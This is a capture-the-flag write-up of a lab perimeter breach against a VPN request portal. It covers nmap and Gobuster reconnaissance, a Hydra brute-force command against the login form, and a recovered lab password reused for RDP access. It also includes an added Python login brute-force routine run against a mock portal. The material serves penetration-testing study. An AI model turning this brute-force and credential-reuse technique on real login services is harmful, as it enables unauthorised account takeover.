# Perimeter Breach

## Target VPN 10.200.XXX.12

## Used Tools

Nmap

Gobuster

Hydra

Burp Suite

diff

Remmina

## Summary

For the perimeter breach we target the public-facing VPN server: by its nature it is likely to be connected to the internal network, which makes it the most promising first target.

Scanning the web server with Gobuster turns up two directories, one of which contains an OpenVPN file that connects us to the internal network. This file is available to anyone and only gives an unstable RDP connection, but it is enough to breach the perimeter and retrieve the first flag. The site also has a login form, which we brute-force with the user and password lists built in the OSINT section. The page behind the login lets us submit a username and generates an individual OpenVPN file, which gives a more stable connection. The form itself is also vulnerable; that is covered in the next chapter, Initial Compromise of Active Directory.

## Recon

The scan shows SSH on port 22 (OpenSSH 7.6p1) and an Apache 2.4.29 web server on port 80 whose title is "VPN Request Portal".

```bash
┌──(0xb0b㉿kali)-[~]
└─$ nmap -sT -sV -sC 10.200.103.12
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 05:38 EDT
Nmap scan report for 10.200.103.12
Host is up (0.070s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e275e6b20f4ba886dccddd911f12b161 (RSA)
|   256 e01568d4735cd6de7d9f9b4cbe9584b3 (ECDSA)
|_  256 35c9f1745f021bbdefe8c8d252f2fe12 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: VPN Request Portal
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.43 seconds
```

<figure><img src="/files/eLPBJGQXUxryKslrQYkT" alt=""><figcaption></figcaption></figure>

Enumerating the web server with Gobuster reveals two directories, `/vpn` and `/vpns`. The `/vpns` directory appears empty, but browsing to `/vpn` lists an OpenVPN file.

<figure><img src="/files/jtYvpdy7Vxp5YhV5eDwG" alt=""><figcaption></figcaption></figure>

Visiting `/vpn`

<figure><img src="/files/9pywidM5o7qB6Da3rKvG" alt=""><figcaption></figcaption></figure>

Visiting `/vpns`

<figure><img src="/files/rQAHAMt7JcYghzrMC4Fo" alt=""><figcaption></figcaption></figure>

Visiting `10.200.XXX.12` directly, the web server greets us with a login prompt.

<figure><img src="/files/UUfdFUqYSHSkJ3KpFLFc" alt=""><figcaption></figcaption></figure>

## Investigation

After reviewing the login request in Burp Suite (parameter names, method and the error text returned for a bad login), we can craft a brute-force attack with Hydra.

<figure><img src="/files/z0OoACDCiXqmWdANphHY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/WvBxMqW3IHwcPVkTd4h0" alt=""><figcaption></figcaption></figure>

Running Hydra with the user and password lists crafted earlier, we retrieve the credentials of a single account:

`laura.wood@corp.thereserve.loc:Password1@`

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ hydra -L users-mail.txt -P passwords.txt 10.200.103.12 http-get-form "/login.php:user=^USER^&password=^PASS^:Please check your username or password" -v
```

<figure><img src="/files/PqrXWFArpLfi7rYafSL9" alt=""><figcaption></figcaption></figure>
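The Hydra command above treats any response that does not contain the failure string as a valid login. The following added example (not part of the write-up, and it never contacts the target) reproduces that logic against a constructed in-memory stand-in for `/login.php` and shows why it is worth also checking for a success marker: once the portal starts answering with a lockout or error page, the failure-string-only rule reports every remaining attempt as a hit. The valid pair is the one recovered above; the second user, the password list, the success marker `Submit an account name` and the lockout behaviour are assumptions made for the demonstration.

```python
"""Login-form brute force in the style of hydra's http-get-form module.

Added example; it is not part of the write-up and does not touch the target.
The portal is simulated by a constructed in-memory handler so the code runs
offline. The valid credential pair is the one recovered above; the second
user, the password list, the success marker and the lockout behaviour are
assumptions made for the demonstration.
"""
from itertools import product

# Failure string used with hydra above: a response that lacks it counts as a hit.
FAIL_STRING = "Please check your username or password"
# Assumed marker of the post-login page (the form that asks for an account name).
SUCCESS_STRING = "Submit an account name"

# Constructed wordlists standing in for users-mail.txt and passwords.txt.
USERS = ["laura.wood@corp.thereserve.loc", "other.user@corp.thereserve.loc"]
PASSWORDS = ["password", "Password1", "Password1!", "Password123",
             "Welcome1", "Summer2023", "Password1@", "Reserve1"]

# Constructed stand-in for /login.php; only laura.wood's pair is valid (from the page).
VALID = {"laura.wood@corp.thereserve.loc": "Password1@"}


def make_mock_portal(lockout_after=None):
    """Return a submit(user, password) -> response body function.

    With lockout_after set, the portal answers every attempt beyond that
    count per user with a lockout message instead of the usual failure text.
    """
    attempts = {}

    def submit(user, password):
        attempts[user] = attempts.get(user, 0) + 1
        if lockout_after is not None and attempts[user] > lockout_after:
            return "<p>Too many failed attempts, account locked</p>"
        if VALID.get(user) == password:
            return "<h1>VPN Request Portal</h1><p>Submit an account name</p>"
        return f"<p>{FAIL_STRING}</p>"

    return submit


def brute_force(submit, users, passwords, fail_string=FAIL_STRING,
                success_string=None):
    """Try every user/password pair; return (hits, anomalies).

    hydra's rule is "no failure string -> success". When success_string is
    given, a response matching neither string is reported as an anomaly
    (lockout, rate limit, error page) instead of being counted as a hit.
    """
    hits, anomalies = [], []
    for user, password in product(users, passwords):
        body = submit(user, password)
        if fail_string in body:
            continue
        if success_string is None or success_string in body:
            hits.append((user, password))
        else:
            anomalies.append((user, password, body))
    return hits, anomalies


if __name__ == "__main__":
    hits, _ = brute_force(make_mock_portal(), USERS, PASSWORDS)
    print("no lockout, failure string only:", hits)
    hits, _ = brute_force(make_mock_portal(lockout_after=5), USERS, PASSWORDS)
    print("lockout after 5, failure string only (false positives):", hits)
    hits, odd = brute_force(make_mock_portal(lockout_after=5), USERS, PASSWORDS,
                            success_string=SUCCESS_STRING)
    print("lockout after 5, both strings:", hits, "anomalies:", len(odd))
```

Against the real portal the same idea is one `-v` run followed by a manual login with each reported pair; in Hydra itself the `S=` form of the condition string (match a success marker) is the equivalent of `success_string` here.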

Using those credentials we are able to log in.

<figure><img src="/files/5k7mQEMlp62L6521JmjU" alt=""><figcaption></figcaption></figure>

The form asks for an account name; after login it is prefilled with `laura.wood@corp.thereserve.loc`.

Submitting my own name instead works just as well.

<figure><img src="/files/MOlydKVGdWt0YjC7ppIc" alt=""><figcaption></figcaption></figure>

Next, we analyze the request in Burp Suite to check whether there is anything special about it.

<figure><img src="/files/gF4Vdyy8qnT8hHM2DjsS" alt=""><figcaption></figcaption></figure>

We download two OpenVPN files for comparison.

<figure><img src="/files/taliCYik7tWDQU7vqfnD" alt=""><figcaption></figcaption></figure>

Diffing the two files shows differences, which hints that each file is generated individually.

<figure><img src="/files/yHnWmVt2H2H2PYr92fpF" alt=""><figcaption></figcaption></figure>

On the first attempt at the beginning of the challenge the routes were set correctly and we were able to reach `10.200.XXX.21` and `.22`, the two `WRK` workstations of the internal network.

<figure><img src="/files/dwCDV4pmauveXrs0maAh" alt=""><figcaption></figcaption></figure>
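A raw `diff` of two `.ovpn` files tells you that they differ, but not where. The added example below (not from the write-up) parses the profiles directive by directive, reports which directives and inline blocks changed, and lists the static `route` entries, which is the quickest way to see whether a profile will give you a path into the internal network before connecting. The two profiles are constructed stand-ins for the public `/vpn` file and a generated per-user file: the server address is the one from the scan, while port, protocol, cipher, route and the certificate bodies are placeholders chosen for the demonstration.

```python
"""Compare two OpenVPN client profiles directive by directive.

Added example, not from the write-up. PUBLIC_OVPN and USER_OVPN are
constructed stand-ins: the remote address is the scanned host, everything
else (port, proto, cipher, route, certificate bodies) is a placeholder.
"""
import re

PUBLIC_OVPN = """\
client
dev tun
proto udp
remote 10.200.103.12 1194
cipher AES-256-CBC
route 10.200.103.0 255.255.255.0
<ca>
-----BEGIN CERTIFICATE-----
CA-PLACEHOLDER
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
CERT-SHARED-PLACEHOLDER
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
KEY-SHARED-PLACEHOLDER
-----END PRIVATE KEY-----
</key>
"""

# Same profile with a fresh certificate/key pair, as a per-user file would carry.
USER_OVPN = PUBLIC_OVPN.replace("SHARED", "LAURA")


def parse_ovpn(text):
    """Split a client profile into plain directives and inline <tag> blocks.

    directives maps a name to the list of argument lists (a directive such as
    'remote' may appear more than once); inline maps a tag to its body.
    """
    directives, inline = {}, {}
    current, body = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if current is not None:
            if line == f"</{current}>":
                inline[current] = "\n".join(body)
                current, body = None, []
            else:
                body.append(line)
            continue
        if not line or line.startswith(("#", ";")):
            continue
        start = re.fullmatch(r"<([a-z-]+)>", line)
        if start:
            current = start.group(1)
            continue
        name, *args = line.split()
        directives.setdefault(name, []).append(args)
    if current is not None:
        raise ValueError(f"unterminated <{current}> block")
    return {"directives": directives, "inline": inline}


def diff_profiles(a, b):
    """Return {'directives:<name>' | 'inline:<tag>': (value_in_a, value_in_b)} for every difference."""
    changes = {}
    for section in ("directives", "inline"):
        for name in sorted(set(a[section]) | set(b[section])):
            if a[section].get(name) != b[section].get(name):
                changes[f"{section}:{name}"] = (a[section].get(name), b[section].get(name))
    return changes


def static_routes(profile):
    """(network, netmask) pairs from 'route' lines in the client file.

    Routes the server pushes with 'push "route ..."' are not in the file;
    check those with 'ip route' after connecting.
    """
    return [tuple(args[:2]) for args in profile["directives"].get("route", [])]


if __name__ == "__main__":
    public, user = parse_ovpn(PUBLIC_OVPN), parse_ovpn(USER_OVPN)
    for key, (old, new) in diff_profiles(public, user).items():
        print(f"{key} differs")
    print("static routes in public profile:", static_routes(public))
```

Running it on the two constructed profiles reports that only the `<cert>` and `<key>` blocks differ, which is the per-user signature; the `<ca>` block, `remote` and `route` lines are identical. If the diff instead touched `remote`, `route` or `redirect-gateway`, the two files would land you in different networks, which is worth knowing before you trust one connection over the other.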

Scanning those reveals their FQDNs, `WRK_.corp.thereserve.loc`, and an open RDP port, `3389`.

<figure><img src="/files/jY3fROQKKXZ9CqqqiIjh" alt=""><figcaption></figcaption></figure>

Connecting to the `WRK1` machine with Remmina and reusing the credentials of `laura.wood` gives us an RDP session on the machine.

<figure><img src="/files/7FXypzXsZx4Bn1NFB79J" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/oHQgaMwsWu8dO7v1PbvN" alt=""><figcaption></figcaption></figure>

On the machine itself we can submit the first flag: the perimeter is breached.

<figure><img src="/files/7X4LBec6g7lJ8EtAXUbg" alt=""><figcaption></figcaption></figure>

## Flag-1: Breaching the Perimeter

For flag submission you have to reach the `10.200.XXX.250` machine, register an account and submit proof of compromise. You provide the machine hostname, then it asks you to store a file at a given location, named after your username and containing the `uuid` it gives you.

For the purpose of the write-up I did not redo this; instead I show how and where to place the given `uuid`, in this case at `C:\Windows\Temp\0xb0b.txt`, as proof of breaching the perimeter.

<figure><img src="/files/DPDzzyYLESYlR82HGRqy" alt=""><figcaption></figcaption></figure>

`echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt`

Note that `cmd.exe` writes the space before `>` into the file as well; if the checker compares the content exactly, drop that space (`echo XXXXXXXX-...>C:\Windows\Temp\0xb0b.txt`) or write the file from PowerShell with `Set-Content`.

